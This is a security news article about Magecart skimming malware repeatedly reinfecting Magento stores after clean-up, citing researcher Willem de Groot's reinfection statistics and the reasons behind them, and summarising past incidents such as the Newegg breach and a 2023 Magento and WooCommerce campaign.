You may think that you’re safe after you’ve removed the malware from your infected online Magento store. However, it turns out that the infamous Magecart malware, known for harvesting credit card details from checkout forms, re-infects even after clean-up.
The researcher behind these findings is Willem de Groot who recently unearthed the most successful skimming campaign, driven by the MagentoCore skimmer. Back in September, the skimmer had already infected 7,339 Magento stores for a period of 6 months, thus becoming the most aggressive campaign discovered by researchers.
The same researcher is the developer of the MageReport, an online malware and vulnerability scanner for online stores. According to de Groot, in the last quarter, 1 out of 5 breached stores were infected (and cleaned) multiple times, some even up to 18 times.
Related: MagentoCore: the Most Aggressive Skimmer Infects 60 Stores per Day
At Least 40,000 Magecart-Like Infections Discovered in 3 Years
The researcher has tracked infections similar to Magecart on at least 40,000 domains for the past three years. His latest findings indicate that during August, September and October, the MageReport scanner came across Magecart skimmers on more than 5,400 domains. Some of these infections turned out to be quite persistent, spending up to 12.7 days on infected domains.
In most cases, however, website admins successfully removed the malicious code. Still, the number of re-infected sites is still quite big – 21.3 percent, with a large number of reinfections taking place within the first day or within a week. The average period for a reinfection was estimated at 10.5 days.
What is the reason for the reinfections? As explained by de Groot, there are several reasons accounting for the repeated malware cases:
- The operators of Magecart often drop backdoor on hacked stores and create rogue admin accounts.
- The malware operators use efficient reinfection mechanisms such as database triggers and hidden periodic tasks.
- The operators also use obfuscation techniques to mask their code.
- The operators often use zero-day exploits to hack vulnerable sites.
Related: Magecart Hackers Stole Customers Payment Card Data from Newegg
Magecart Malware History and Overview of Attacks
While Magecart’s origins date back to around 2010, the first large-scale attack reportedly occurred in 2015, as documented by Sansec. This cybersecurity firm uncovered a startling revelation — cybercriminals had infiltrated 3,500 online stores by injecting malicious code into the headers or footers of shopping site pages. The injected JavaScript skillfully identified credit card numbers entered into checkout forms and utilized AJAX to duplicate and transmit the form data to a location controlled by the hackers.
Astonishingly, this compromise remained active for six months before detection, potentially exposing hundreds of thousands of harvested credit cards. Subsequently, Magecart attackers have continually refined their methods, including launching exploits targeting third-party website tools. In 2019, they compromised tools like the Picreel premium conversion optimization plugin, embedding their code to harvest payment details across thousands of websites. Notably, even Google Tag Manager has been exploited in similar ways.
In September 2018, the Magecart operators made another major hit, infiltrating the secure servers of the popular Newegg site. All entered data in the period between August 14 and September 18 was affected. Both desktop and mobile customers were compromised by the breach. Statistics revealed that the site has more than 50 million visitors. The fact that the digital skimmer code was available for a significant period of time gives security researchers reasons to believe that millions of customers were potentially affected.
In February 2017, the same researcher analyzed a piece of another evolved Magento malware which was capable of self-healing. This process was possible thanks to hidden code in the targeted website’s database.
Is Magecart Malware Still Around in 2023
Shortly said, yes.
A recently identified Magecart web skimming campaign, characterized by its sophistication and covert nature, has been specifically targeting Magento and WooCommerce websites. Notably, victims of this campaign include entities affiliated with significant organizations in the food and retail sectors.
Based on the evidence uncovered, it appears that this campaign has been operational for several weeks, and in certain instances, even longer. What sets this campaign apart is the utilization of a highly advanced concealment technique, surprising cybersecurity experts due to its unprecedented level of sophistication.
The campaign underscores the perpetual evolution of web skimming techniques. These methods are progressively advancing in sophistication, posing heightened challenges for detection and mitigation through static analysis and external scanning, researchers say. Threat actors operating in this field continuously innovate, employing more effective methods to conceal their attacks within victim websites and elude various security measures designed to expose them.
Milena Dimitrova
An inspired writer and content manager who has been with SensorsTechForum since the project started. A professional with 10+ years of experience in creating engaging content. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim
Follow Me: